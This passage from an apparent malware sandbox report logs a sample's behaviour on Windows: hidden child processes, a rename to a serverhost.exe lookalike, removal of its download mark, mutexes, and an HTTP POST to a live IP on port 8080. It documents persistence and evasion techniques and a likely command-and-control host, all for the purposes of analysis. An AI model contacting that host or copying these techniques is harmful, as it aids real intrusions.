Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Get Time type = Ticks, time = 91853 True 1
Get Time type = Ticks, time = 92867 True 1
Get Time type = Ticks, time = 93865 True 1
Get Time type = Ticks, time = 94864 True 1
Get Time type = Ticks, time = 95862 True 1
Get Time type = Ticks, time = 96861 True 1
Get Time type = Ticks, time = 97859 True 1
Get Time type = Ticks, time = 98857 True 1
Get Time type = Ticks, time = 99856 True 1
Get Time type = Ticks, time = 100901 True 1
Get Time type = Ticks, time = 101119 True 1
Get Time type = Ticks, time = 101915 True 1
Get Time type = Ticks, time = 102945 True 1
Get Time type = Ticks, time = 103927 True 1
Get Time type = Ticks, time = 104926 True 1
Get Info type = Windows Directory, result_out = C:\Windows True 2
Get Info type = Operating System False 1
Get Info type = Hardware Information True 1
Mutex (4)
Operation Additional Information Success Count Logfile
Create mutex_name = MA991ED3B True 1
Create mutex_name = Global\I78B95E2E True 1
Create mutex_name = Global\M78B95E2E True 1
Release mutex_name = Global\I78B95E2E True 1
Debug (499)
Operation Process Additional Information Success Count Logfile
Check for Presence c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe True 499
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 0.32 KB (330 bytes)
Total Data Received 60.59 KB (62044 bytes)
Contacted Host Count 1
Contacted Hosts 74.208.155.175
HTTP Session #1
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Server Name 74.208.155.175
Server Port 8080
Username 0
Password 0
Data Sent 0.32 KB (330 bytes)
Data Received 60.59 KB (62044 bytes)
Operations
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = HTTP, server_name = 74.208.155.175, server_port = 8080, user_name = 0, password = 0 True 1
Open HTTP Request http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Send HTTP Request headers = 0 True 1
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Query HTTP Info flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 True 1
Read Response size = 62036, size_out = 62036 True 1
Read Response size = 0, size_out = 0 True 1
Close Session True 1
Process #8: ekgeobhbhtp7rxmh.exe
(Host: 40, Network: 0)
Information Value
ID #8
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:08, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:17
OS Process Information
Information Value
PID 0xbdc
Parent PID 0xb04 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xBE0
0xBE4
0xBE8
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
locale.nls 0x00040000 0x000a6fff Memory Mapped File Readable False False False
private_0x00000000000b0000 0x000b0000 0x000b0fff Private Memory Readable, Writable True True False
pagefile_0x00000000000c0000 0x000c0000 0x000c6fff Pagefile Backed Memory Readable True False False
private_0x00000000000d0000 0x000d0000 0x000dffff Private Memory Readable, Writable True True False
pagefile_0x00000000000e0000 0x000e0000 0x001a7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001b0000 0x001b0000 0x001b1fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001c0000 0x001c0000 0x001c0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x001e0000 0x001e0fff Memory Mapped File Readable False False False
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory Readable, Writable True True False
pagefile_0x00000000002f0000 0x002f0000 0x002f1fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00300000 0x0035bfff Memory Mapped File Readable False False False
private_0x0000000000300000 0x00300000 0x00323fff Private Memory Readable, Writable True True False
private_0x0000000000300000 0x00300000 0x00311fff Private Memory Readable, Writable True True False
private_0x0000000000320000 0x00320000 0x0032cfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000330000 0x00330000 0x00330fff Private Memory Readable, Writable True True False
private_0x0000000000340000 0x00340000 0x00348fff Private Memory Readable, Writable True True False
private_0x0000000000340000 0x00340000 0x00351fff Private Memory Readable, Writable True True False
private_0x0000000000350000 0x00350000 0x00373fff Private Memory Readable, Writable True True False
private_0x0000000000360000 0x00360000 0x00371fff Private Memory Readable, Writable True True False
private_0x0000000000380000 0x00380000 0x00388fff Private Memory Readable, Writable True True False
private_0x0000000000380000 0x00380000 0x0038cfff Private Memory Readable, Writable True True False
private_0x00000000003b0000 0x003b0000 0x004affff Private Memory Readable, Writable True True False
pagefile_0x00000000004b0000 0x004b0000 0x005b0fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005c0000 0x005c0000 0x009b2fff Pagefile Backed Memory Readable True False False
private_0x00000000009c0000 0x009c0000 0x00abffff Private Memory Readable, Writable True True False
private_0x00000000009c0000 0x009c0000 0x00a07fff Private Memory Readable, Writable True True False
private_0x0000000000a10000 0x00a10000 0x00a57fff Private Memory Readable, Writable True True False
private_0x0000000000a80000 0x00a80000 0x00abffff Private Memory Readable, Writable True True False
private_0x0000000000b90000 0x00b90000 0x00b9ffff Private Memory Readable, Writable True True False
ekgeobhbhtp7rxmh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01860000 0x01b2efff Memory Mapped File Readable False False False
private_0x0000000001bd0000 0x01bd0000 0x01ccffff Private Memory Readable, Writable True True False
private_0x0000000001d50000 0x01d50000 0x01e4ffff Private Memory Readable, Writable True True False
pagefile_0x0000000001e50000 0x01e50000 0x01f2efff Pagefile Backed Memory Readable True False False
private_0x0000000001f30000 0x01f30000 0x0202ffff Private Memory Readable, Writable True True False
imageres.dll 0x61140000 0x62495fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x624a0000 0x637f5fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x735e0000 0x736dafff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd3000 0x7ffd3000 0x7ffd3fff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (2)
Operation Filename Additional Information Success Count Logfile
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Process (1)
Operation Process Additional Information Success Count Logfile
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe os_pid = 0xbec, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (33)
+
Operation Module Additional Information Success Count Logfile
Load USER32.dll base_address = 0x76890000 True 1
Fn
Load KERNEL32.dll base_address = 0x76590000 True 2
Fn
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Fn
Load ntdll.dll base_address = 0x772a0000 True 1
Fn
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe base_address = 0xc40000 True 1
Fn
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 259 True 1
Fn
Get Filename process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\user32.dll function = ReleaseCapture, address_out = 0x768c69f2 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetProcessWindowStation, address_out = 0x7689dfdc True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetCaretBlinkTime, address_out = 0x768a0d01 True 1
Fn
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef63c True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef65c True 1
Get Address function = LoadLibraryA, ordinal = 0, address_out = 0x2ef73c True 1
Get Address function = GetProcAddress, ordinal = 0, address_out = 0x2ef73c True 1
Get Address function = VirtualAlloc, ordinal = 0, address_out = 0x2ef73c True 1
Get Address function = VirtualProtect, ordinal = 0, address_out = 0x2ef73c True 1
Get Address function = UnmapViewOfFile, ordinal = 0, address_out = 0x2ef73c True 1
Get Address function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef73c True 1
Get Address function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x2ef73c True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleFileNameA, address_out = 0x765e33f6 True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameA, address_out = 0x765c6ba9 True 1
Get Address c:\windows\system32\kernel32.dll function = CloseHandle, address_out = 0x765dca7c True 1
Get Address c:\windows\system32\kernel32.dll function = lstrcmpA, address_out = 0x765c8c59 True 1
Get Address c:\windows\system32\kernel32.dll function = FreeConsole, address_out = 0x7663bfde True 1
Get Address c:\windows\system32\kernel32.dll function = GetComputerNameExA, address_out = 0x7661f41f True 1
Get Address c:\windows\system32\kernel32.dll function = GetModuleHandleA, address_out = 0x765dcf41 True 1
Get Address c:\windows\system32\kernel32.dll function = CreateFileA, address_out = 0x765dcee8 True 1
Get Address c:\windows\system32\advapi32.dll function = GetUserNameA, address_out = 0x7651a4b4 True 1
Get Address c:\windows\system32\shlwapi.dll function = StrStrIA, address_out = 0x76b4d250 True 1
Get Address c:\windows\system32\ntdll.dll function = strchr, address_out = 0x772e7690 True 1
Get Address c:\windows\system32\kernel32.dll function = WTSGetActiveConsoleSessionId, address_out = 0x765c480b True 1
System (2)
Operation Additional Information Success Count
Get Computer Name result_out = F71GWAT True 1
Get Computer Name result_out = F71gwat, type = ComputerNameDnsHostname True 1
Mutex (1)
Operation Additional Information Success Count
Create mutex_name = MB66D4A35 True 1
Process #9: ekgeobhbhtp7rxmh.exe
(Host: 72, Network: 0)
Information Value
ID #9
File Name c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe
Command Line "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:01:10, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
Information Value
PID 0xbec
Parent PID 0xbdc (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000fcb0 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x BF0
0x BF4
0x BF8
0x BFC
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
private_0x0000000000040000 0x00040000 0x00040fff Private Memory Readable, Writable True True False
private_0x0000000000050000 0x00050000 0x0014ffff Private Memory Readable, Writable True True False
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False
pagefile_0x00000000001c0000 0x001c0000 0x001c6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000001d0000 0x001d0000 0x001d1fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000001e0000 0x001e0000 0x001e0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000001f0000 0x001f0000 0x002effff Private Memory Readable, Writable True True False
pagefile_0x00000000002f0000 0x002f0000 0x002f1fff Pagefile Backed Memory Readable True False False
windowsshell.manifest 0x00300000 0x00300fff Memory Mapped File Readable False False False
pagefile_0x0000000000300000 0x00300000 0x00300fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000310000 0x00310000 0x00311fff Pagefile Backed Memory Readable True False False
rpcss.dll 0x00320000 0x0037bfff Memory Mapped File Readable False False False
private_0x0000000000320000 0x00320000 0x00343fff Private Memory Readable, Writable True True False
private_0x0000000000320000 0x00320000 0x00331fff Private Memory Readable, Writable True True False
private_0x0000000000340000 0x00340000 0x0034cfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000350000 0x00350000 0x00350fff Private Memory Readable, Writable True True False
private_0x0000000000360000 0x00360000 0x00368fff Private Memory Readable, Writable True True False
private_0x0000000000360000 0x00360000 0x00371fff Private Memory Readable, Writable True True False
private_0x0000000000370000 0x00370000 0x00393fff Private Memory Readable, Writable True True False
private_0x0000000000380000 0x00380000 0x00391fff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003affff Private Memory Readable, Writable True True False
pagefile_0x00000000003b0000 0x003b0000 0x00477fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000480000 0x00480000 0x00580fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000590000 0x00590000 0x00982fff Pagefile Backed Memory Readable True False False
private_0x0000000000990000 0x00990000 0x00aeffff Private Memory Readable, Writable True True False
pagefile_0x0000000000990000 0x00990000 0x00a6efff Pagefile Backed Memory Readable True False False
private_0x0000000000a70000 0x00a70000 0x00a78fff Private Memory Readable, Writable True True False
private_0x0000000000a70000 0x00a70000 0x00a7cfff Private Memory Readable, Writable True True False
pagefile_0x0000000000a80000 0x00a80000 0x00a96fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a80000 0x00a80000 0x00a80fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a90000 0x00a90000 0x00a90fff Pagefile Backed Memory Readable True False False
cversions.2.db 0x00aa0000 0x00aa3fff Memory Mapped File Readable True False False
private_0x0000000000ab0000 0x00ab0000 0x00aeffff Private Memory Readable, Writable True True False
private_0x0000000000af0000 0x00af0000 0x00afffff Private Memory Readable, Writable True True False
private_0x0000000000b00000 0x00b00000 0x00bfffff Private Memory Readable, Writable True True False
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db 0x00c00000 0x00c2ffff Memory Mapped File Readable True False False
cversions.2.db 0x00c30000 0x00c33fff Memory Mapped File Readable True False False
ekgeobhbhtp7rxmh.exe 0x00c40000 0x00c5afff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c60000 0x00c60000 0x0185ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01860000 0x01b2efff Memory Mapped File Readable False False False
private_0x0000000001b30000 0x01b30000 0x01b77fff Private Memory Readable, Writable True True False
pagefile_0x0000000001b80000 0x01b80000 0x01b80fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000001b90000 0x01b90000 0x01c8ffff Private Memory Readable, Writable True True False
private_0x0000000001c90000 0x01c90000 0x01cd7fff Private Memory Readable, Writable True True False
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db 0x01ce0000 0x01d45fff Memory Mapped File Readable True False False
private_0x0000000001d90000 0x01d90000 0x01e8ffff Private Memory Readable, Writable True True False
private_0x0000000001f90000 0x01f90000 0x0208ffff Private Memory Readable, Writable True True False
imageres.dll 0x61140000 0x62495fff Memory Mapped File Readable, Writable, Executable False False False
imageres.dll 0x624a0000 0x637f5fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x6eb50000 0x6ebd3fff Memory Mapped File Readable, Writable, Executable False False False
apphelp.dll 0x71510000 0x7155bfff Memory Mapped File Readable, Writable, Executable False False False
windowscodecs.dll 0x735e0000 0x736dafff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x739d0000 0x73a0ffff Memory Mapped File Readable, Writable, Executable False False False
wtsapi32.dll 0x74180000 0x7418cfff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742b0000 0x7444dfff Memory Mapped File Readable, Writable, Executable False False False
propsys.dll 0x74600000 0x746f4fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74800000 0x74820fff Memory Mapped File Readable, Writable, Executable False False False
userenv.dll 0x74af0000 0x74b06fff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74e70000 0x74e85fff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75320000 0x7533afff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75340000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x753f0000 0x753fafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x75460000 0x7546bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75470000 0x754b9fff Memory Mapped File Readable, Writable, Executable False False False
cfgmgr32.dll 0x754c0000 0x754e6fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x755b0000 0x756ccfff Memory Mapped File Readable, Writable, Executable False False False
devobj.dll 0x756d0000 0x756e1fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x756f0000 0x75708fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x75710000 0x757b0fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x757c0000 0x7588bfff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x764f0000 0x7658ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76590000 0x76663fff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x766f0000 0x76772fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x76780000 0x7682bfff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76840000 0x7688dfff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76890000 0x76958fff Memory Mapped File Readable, Writable, Executable False False False
setupapi.dll 0x769a0000 0x76b3cfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76b40000 0x76b96fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76ba0000 0x76c2efff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76c60000 0x76e5afff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76e60000 0x76efcfff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76f00000 0x77035fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x77040000 0x77134fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x77140000 0x7729bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x772a0000 0x773dbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x77400000 0x7741efff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x77420000 0x77464fff Memory Mapped File Readable, Writable, Executable False False False
apisetschema.dll 0x774e0000 0x774e0fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007f6f0000 0x7f6f0000 0x7f7effff Pagefile Backed Memory Readable True False False
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False
private_0x000000007ffd6000 0x7ffd6000 0x7ffd6fff Private Memory Readable, Writable True True False
private_0x000000007ffdc000 0x7ffdc000 0x7ffdcfff Private Memory Readable, Writable True True False
private_0x000000007ffdd000 0x7ffdd000 0x7ffddfff Private Memory Readable, Writable True True False
private_0x000000007ffde000 0x7ffde000 0x7ffdefff Private Memory Readable, Writable True True False
private_0x000000007ffdf000 0x7ffdf000 0x7ffdffff Private Memory Readable, Writable True True False
Host Behavior
File (13)
Operation Filename Additional Information Success Count
Create C:\email.doc desired_access = GENERIC_READ False 1
Create C:\a\foobar.bmp desired_access = GENERIC_READ False 1
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe type = size True 1
Get Info C:\ type = file_attributes True 1
Get Info C:\Users\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\ type = file_attributes True 1
Get Info C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ type = file_attributes True 1
Move C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe source_filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe True 1
Delete C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe:Zone.Identifier False 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe os_pid = 0xc04, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE True 1
Module (44)
Operation Module Additional Information Success Count
Load USER32.dll base_address = 0x76890000 True 1
Load KERNEL32.dll base_address = 0x76590000 True 2
Load ADVAPI32.dll base_address = 0x764f0000 True 1
Load SHLWAPI.dll base_address = 0x76b40000 True 1
Load ntdll.dll base_address = 0x772a0000 True 1
Load advapi32.dll base_address = 0x764f0000 True 1
Load ole32.dll base_address = 0x77140000 True 1
Load shell32.dll base_address = 0x758a0000 True 1
Load crypt32.dll base_address = 0x755b0000 True 1
Load urlmon.dll base_address = 0x76f00000 True 1
Load userenv.dll base_address = 0x74af0000 True 1
Load wininet.dll base_address = 0x77040000 True 1
Load wtsapi32.dll base_address = 0x74180000 True 1
Get Handle c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe base_address = 0xc40000 True 1
Get Filename c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\ekgeobhbhtp7rxmh.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\ekgEobhbhTp7rXMh.exe, size = 259 True 1
